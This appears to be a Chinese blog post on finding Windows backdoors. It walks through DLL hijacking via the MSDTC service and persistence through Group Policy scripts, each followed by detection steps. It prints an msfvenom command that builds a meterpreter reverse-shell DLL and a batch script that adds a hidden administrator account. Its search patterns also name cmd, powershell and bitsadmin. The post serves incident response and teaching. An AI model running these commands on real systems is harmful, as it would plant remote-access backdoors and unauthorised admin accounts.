当前位置: 首页 > news >正文

Windows后门排查_2025/11/24(持续更新)

Windows后门排查

dll劫持

dll劫持介绍

劫持原理:

为了性能需求,程序开发时会同时开发一些dll文件,不过并没有指明绝对路径;所以程序启动时就会寻找并加载这些dll文件,寻找并加载的优先级如下:

1.应用程序所在目录
2.C:\Windows\System32
3.C:\Windows\System
4.C:\Windows
5.当前工作目录
6.PATH环境变量中的目录

如果用户有权限修改替换其中的文件为后门,当程序启动时就会运行后门。

示例(MSDTC服务):

当MSDTC服务启动时,它将搜索注册表中的dll文件oci.dllSQLLib80.dllxa80.dll

4ebc576c22d69080bbea1b7288013272

Windows系统默认不包含oci.dll,我们通过如下方式生成一个恶意的oci.dll文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 -f dll >oci.dll

将这个恶意文件上传到 C:\Windows\System32 目录下,重启msdtc服务就能加载后门。

taskkill /f /im msdtc.exe
net start msdtc

检测手段

1.排查常见劫持DLL文件名

目录 常见劫持DLL文件名
C:\ProgramData\ version.dll, wlbsctrl.dll, cryptsp.dll
C:\Windows\Temp\ version.dll, VBoxService.dll
%TEMP% nvcuda.dll, dwmapi.dll
C:\Users\Public\ COMCTL32.dll, powrprof.dll
C:\Windows\System32\spool\drivers... printconfig.dll
# 1. 检查WMI劫持
Get-ChildItem "C:\Windows\System32\wbem\" -Include version.dll,wlbsctrl.dll -Recurse
Get-ChildItem "C:\ProgramData\" -Include version.dll -Recurse# 2. 检查打印机驱动劫持
Get-ChildItem "C:\Windows\System32\spool\drivers\x64\3\" -Include *.dll -Recurse# 3. 检查TS远程桌面劫持(tsappcmp.dll, tsmsisrv.dll)
dir "C:\ProgramData" tsappcmp.dll /s

2.工具扫描

https://github.com/yeyintmynwht/DLL-Hijacking-Scanner

https://github.com/stephenfewer/ReflectiveDLLInjection/tree/master/dll_hijack_detect

https://learn.microsoft.com/sysinternals/downloads/process-explorer)

组策略

组策略脚本

内容:

创建一个脚本,内容是添加隐藏用户:

@echo off
net user test$ 123456 /add
net localgroup administrators test$ /add
exit

打开组策略添加脚本:

99b41984a3b9ed0af0122296874a9f15

关机后就会执行脚本。

检测手段

1.直接打开组策略编辑器检查

类型 GPO路径(域控SYSVOL) 典型恶意文件
计算机启动/关机脚本 \\domain\SYSVOL\domain\Policies\{GPO-GUID}\Machine\Scripts\Startup .ps1 / .bat / .vbs / .exe
计算机启动/关机脚本 ...Shutdown 同上
用户登录/注销脚本 ...Policies\{GPO-GUID}\User\Scripts\Logon .ps1 / .bat / .vbs / .exe
用户登录/注销脚本 ...Logoff 同上

2.通过组策略脚本执行的注册表持久化

搜索所有组策略下发的注册表项(重点看Run键)

Get-ChildItem "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies" -Recurse -Include Registry.xml | ForEach-Object {Select-String -Path $_ -Pattern "Run|RunOnce|AppInit_DLLs|IFEO|shell|powershell|cmd|bitsadmin" -Context 0,5
}

3.工具扫描:

红队利用工具:https://github.com/FSecureLABs/SharpGPOAbuse

http://www.jsqmd.com/news/49590/

相关文章:

  • 2025年11月江苏徐州系统门窗隔热条、江苏门窗隔热条、国标隔热条、隔热条、定制隔热产品厂家综合推荐指南
  • 188. 买卖股票的最佳时机 IV -- DP问题如何确定dp数组的含义以及状态转移方程?
  • 博客园真不错
  • MAF快速入门(2)Agent的花样玩法
  • 效率与安全的双引擎:聚焦合同管理中的印章文识别技术
  • re笔记1
  • 海外求职必备:多语言AI简历工具如何助力求职外企和跨国公司
  • MATLAB/Simulink水箱水位控制系统实现
  • AI语言大模型支持下的:SCI论文从设计到发表的全流技巧(选题、文献调研、实验设计、数据分析、论文结构及语言规范) - 教程
  • Ai元人文:前言
  • Oracle ASM存储维护实践与规范指南
  • 新露谷物语-新手指南:
  • 从 runC 到 runD:SAE 如何用 “装甲级” 隔离,化解运维安全焦虑!
  • 实用指南:SAP MM 采购申请转采购订单功能分享
  • ddddocr: 滑块验证码的一个例子
  • 恢复Windows图片查看器
  • 没有root权限在linux安装python库
  • 2025白酒品牌推荐:聚会必备气氛担当,7 款让酒桌升温的纯粮好酒
  • linux之基于信号解决僵尸进程的写法
  • 《ESP32-S3使用指南—IDF版 V1.6》第五十章 WiFi热点实验
  • 各位大哥好
  • 【无标题】HIT-ICS2025计统大作业——程序人生 - 详解
  • mapvthree Engine 设计分析——二三维一体化的架构设计
  • eMMC, UFS,SATA,PCIe/NVMe
  • 2025 十大充电桩品牌推荐:全场景覆盖 + 硬核产品,这些厂家领跑行业
  • 2025年一对一家教老师实力排行权威发布,上门家教/一对一家教一对一家教老师推荐榜单
  • 2025工地洗车池厂家推荐-实用厂家深度分析
  • B2B企业必看:2025年5家TOB场景GEO服务商深度测评
  • 人工智能之数据分析 numpy:第十三章 工具衔接与迁移
  • 北京家事律师事务所有哪些?本地优质机构推荐